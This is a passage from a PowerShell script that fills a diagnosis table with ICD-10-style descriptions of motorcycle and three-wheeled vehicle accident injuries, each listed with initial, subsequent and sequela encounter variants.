motorcycle injured in collision with heavy transport vehicle or bus","Person boarding or alighting a motorcycle injured in collision with heavy transport vehicle or bus, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with heavy transport vehicle or bus","Person boarding or alighting a motorcycle injured in collision with heavy transport vehicle or bus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with heavy transport vehicle or bus","Person boarding or alighting a motorcycle injured in collision with heavy transport vehicle or bus, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with heavy transport vehicle or bus in traffic accident","Motorcycle driver injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with heavy transport vehicle or bus in traffic accident","Motorcycle driver injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with heavy transport vehicle or bus in traffic accident","Motorcycle driver injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with heavy transport vehicle or bus in traffic accident","Motorcycle passenger injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with heavy transport vehicle or bus in traffic accident","Motorcycle passenger injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with heavy transport vehicle or bus in traffic accident","Motorcycle passenger injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with railway train or railway vehicle in nontraffic accident","Motorcycle driver injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with railway train or railway vehicle in nontraffic accident","Motorcycle driver injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with railway train or railway vehicle in nontraffic accident","Motorcycle driver injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with railway train or railway vehicle in nontraffic accident","Motorcycle passenger injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with railway train or railway vehicle in nontraffic accident","Motorcycle passenger injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with railway train or railway vehicle in nontraffic accident","Motorcycle passenger injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified motorcycle rider injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified motorcycle rider injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified motorcycle rider injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with railway train or railway vehicle","Person boarding or alighting a motorcycle injured in collision with railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with railway train or railway vehicle","Person boarding or alighting a motorcycle injured in collision with railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with railway train or railway vehicle","Person boarding or alighting a motorcycle injured in collision with railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with railway train or railway vehicle in traffic accident","Motorcycle driver injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with railway train or railway vehicle in traffic accident","Motorcycle driver injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with railway train or railway vehicle in traffic accident","Motorcycle driver injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with railway train or railway vehicle in traffic accident","Motorcycle passenger injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with railway train or railway vehicle in traffic accident","Motorcycle passenger injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with railway train or railway vehicle in traffic accident","Motorcycle passenger injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with railway train or railway vehicle in traffic accident","Unspecified motorcycle rider injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with railway train or railway vehicle in traffic accident","Unspecified motorcycle rider injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with railway train or railway vehicle in traffic accident","Unspecified motorcycle rider injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other nonmotor vehicle in nontraffic accident","Motorcycle driver injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other nonmotor vehicle in nontraffic accident","Motorcycle driver injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other nonmotor vehicle in nontraffic accident","Motorcycle driver injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other nonmotor vehicle in nontraffic accident","Motorcycle passenger injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other nonmotor vehicle in nontraffic accident","Motorcycle passenger injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other nonmotor vehicle in nontraffic accident","Motorcycle passenger injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified motorcycle rider injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified motorcycle rider injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified motorcycle rider injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with other nonmotor vehicle","Person boarding or alighting a motorcycle injured in collision with other nonmotor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with other nonmotor vehicle","Person boarding or alighting a motorcycle injured in collision with other nonmotor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with other nonmotor vehicle","Person boarding or alighting a motorcycle injured in collision with other nonmotor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other nonmotor vehicle in traffic accident","Motorcycle driver injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other nonmotor vehicle in traffic accident","Motorcycle driver injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other nonmotor vehicle in traffic accident","Motorcycle driver injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other nonmotor vehicle in traffic accident","Motorcycle passenger injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other nonmotor vehicle in traffic accident","Motorcycle passenger injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other nonmotor vehicle in traffic accident","Motorcycle passenger injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other nonmotor vehicle in traffic accident","Unspecified motorcycle rider injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other nonmotor vehicle in traffic accident","Unspecified motorcycle rider injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other nonmotor vehicle in traffic accident","Unspecified motorcycle rider injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with fixed or stationary object in nontraffic accident","Motorcycle driver injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with fixed or stationary object in nontraffic accident","Motorcycle driver injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with fixed or stationary object in nontraffic accident","Motorcycle driver injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with fixed or stationary object in nontraffic accident","Motorcycle passenger injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with fixed or stationary object in nontraffic accident","Motorcycle passenger injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with fixed or stationary object in nontraffic accident","Motorcycle passenger injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with fixed or stationary object in nontraffic accident","Unspecified motorcycle rider injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with fixed or stationary object in nontraffic accident","Unspecified motorcycle rider injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with fixed or stationary object in nontraffic accident","Unspecified motorcycle rider injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with fixed or stationary object","Person boarding or alighting a motorcycle injured in collision with fixed or stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with fixed or stationary object","Person boarding or alighting a motorcycle injured in collision with fixed or stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with fixed or stationary object","Person boarding or alighting a motorcycle injured in collision with fixed or stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with fixed or stationary object in traffic accident","Motorcycle driver injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with fixed or stationary object in traffic accident","Motorcycle driver injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with fixed or stationary object in traffic accident","Motorcycle driver injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with fixed or stationary object in traffic accident","Motorcycle passenger injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with fixed or stationary object in traffic accident","Motorcycle passenger injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with fixed or stationary object in traffic accident","Motorcycle passenger injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with fixed or stationary object in traffic accident","Unspecified motorcycle rider injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with fixed or stationary object in traffic accident","Unspecified motorcycle rider injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with fixed or stationary object in traffic accident","Unspecified motorcycle rider injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in noncollision transport accident in nontraffic accident","Motorcycle driver injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in noncollision transport accident in nontraffic accident","Motorcycle driver injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in noncollision transport accident in nontraffic accident","Motorcycle driver injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in noncollision transport accident in nontraffic accident","Motorcycle passenger injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in noncollision transport accident in nontraffic accident","Motorcycle passenger injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in noncollision transport accident in nontraffic accident","Motorcycle passenger injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in noncollision transport accident in nontraffic accident","Unspecified motorcycle rider injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in noncollision transport accident in nontraffic accident","Unspecified motorcycle rider injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in noncollision transport accident in nontraffic accident","Unspecified motorcycle rider injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in noncollision transport accident","Person boarding or alighting a motorcycle injured in noncollision transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in noncollision transport accident","Person boarding or alighting a motorcycle injured in noncollision transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in noncollision transport accident","Person boarding or alighting a motorcycle injured in noncollision transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in noncollision transport accident in traffic accident","Motorcycle driver injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in noncollision transport accident in traffic accident","Motorcycle driver injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in noncollision transport accident in traffic accident","Motorcycle driver injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in noncollision transport accident in traffic accident","Motorcycle passenger injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in noncollision transport accident in traffic accident","Motorcycle passenger injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in noncollision transport accident in traffic accident","Motorcycle passenger injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in noncollision transport accident in traffic accident","Unspecified motorcycle rider injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in noncollision transport accident in traffic accident","Unspecified motorcycle rider injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in noncollision transport accident in traffic accident","Unspecified motorcycle rider injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with unspecified motor vehicles in nontraffic accident","Motorcycle driver injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with unspecified motor vehicles in nontraffic accident","Motorcycle driver injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with unspecified motor vehicles in nontraffic accident","Motorcycle driver injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other motor vehicles in nontraffic accident","Motorcycle driver injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other motor vehicles in nontraffic accident","Motorcycle driver injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other motor vehicles in nontraffic accident","Motorcycle driver injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with unspecified motor vehicles in nontraffic accident","Motorcycle passenger injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with unspecified motor vehicles in nontraffic accident","Motorcycle passenger injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with unspecified motor vehicles in nontraffic accident","Motorcycle passenger injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other motor vehicles in nontraffic accident","Motorcycle passenger injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other motor vehicles in nontraffic accident","Motorcycle passenger injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other motor vehicles in nontraffic accident","Motorcycle passenger injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified motorcycle rider injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified motorcycle rider injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified motorcycle rider injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other motor vehicles in nontraffic accident","Unspecified motorcycle rider injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other motor vehicles in nontraffic accident","Unspecified motorcycle rider injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other motor vehicles in nontraffic accident","Unspecified motorcycle rider injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in unspecified nontraffic accident","Motorcycle rider (driver) (passenger) injured in unspecified nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in unspecified nontraffic accident","Motorcycle rider (driver) (passenger) injured in unspecified nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in unspecified nontraffic accident","Motorcycle rider (driver) (passenger) injured in unspecified nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with unspecified motor vehicles in traffic accident","Motorcycle driver injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with unspecified motor vehicles in traffic accident","Motorcycle driver injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with unspecified motor vehicles in traffic accident","Motorcycle driver injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other motor vehicles in traffic accident","Motorcycle driver injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other motor vehicles in traffic accident","Motorcycle driver injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with other motor vehicles in traffic accident","Motorcycle driver injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with unspecified motor vehicles in traffic accident","Motorcycle passenger injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with unspecified motor vehicles in traffic accident","Motorcycle passenger injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with unspecified motor vehicles in traffic accident","Motorcycle passenger injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other motor vehicles in traffic accident","Motorcycle passenger injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other motor vehicles in traffic accident","Motorcycle passenger injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with other motor vehicles in traffic accident","Motorcycle passenger injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with unspecified motor vehicles in traffic accident","Unspecified motorcycle rider injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with unspecified motor vehicles in traffic accident","Unspecified motorcycle rider injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with unspecified motor vehicles in traffic accident","Unspecified motorcycle rider injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other motor vehicles in traffic accident","Unspecified motorcycle rider injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other motor vehicles in traffic accident","Unspecified motorcycle rider injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with other motor vehicles in traffic accident","Unspecified motorcycle rider injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in transport accident with military vehicle","Motorcycle rider (driver) (passenger) injured in transport accident with military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in transport accident with military vehicle","Motorcycle rider (driver) (passenger) injured in transport accident with military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in transport accident with military vehicle","Motorcycle rider (driver) (passenger) injured in transport accident with military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in other specified transport accidents","Motorcycle rider (driver) (passenger) injured in other specified transport accidents, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in other specified transport accidents","Motorcycle rider (driver) (passenger) injured in other specified transport accidents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in other specified transport accidents","Motorcycle rider (driver) (passenger) injured in other specified transport accidents, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in unspecified traffic accident","Motorcycle rider (driver) (passenger) injured in unspecified traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in unspecified traffic accident","Motorcycle rider (driver) (passenger) injured in unspecified traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle rider (driver) (passenger) injured in unspecified traffic accident","Motorcycle rider (driver) (passenger) injured in unspecified traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedestrian or animal","Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedestrian or animal, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedestrian or animal","Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedestrian or animal, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedestrian or animal","Person boarding or alighting a three-wheeled motor vehicle injured in collision with pedestrian or animal, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Driver of three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with pedestrian or animal 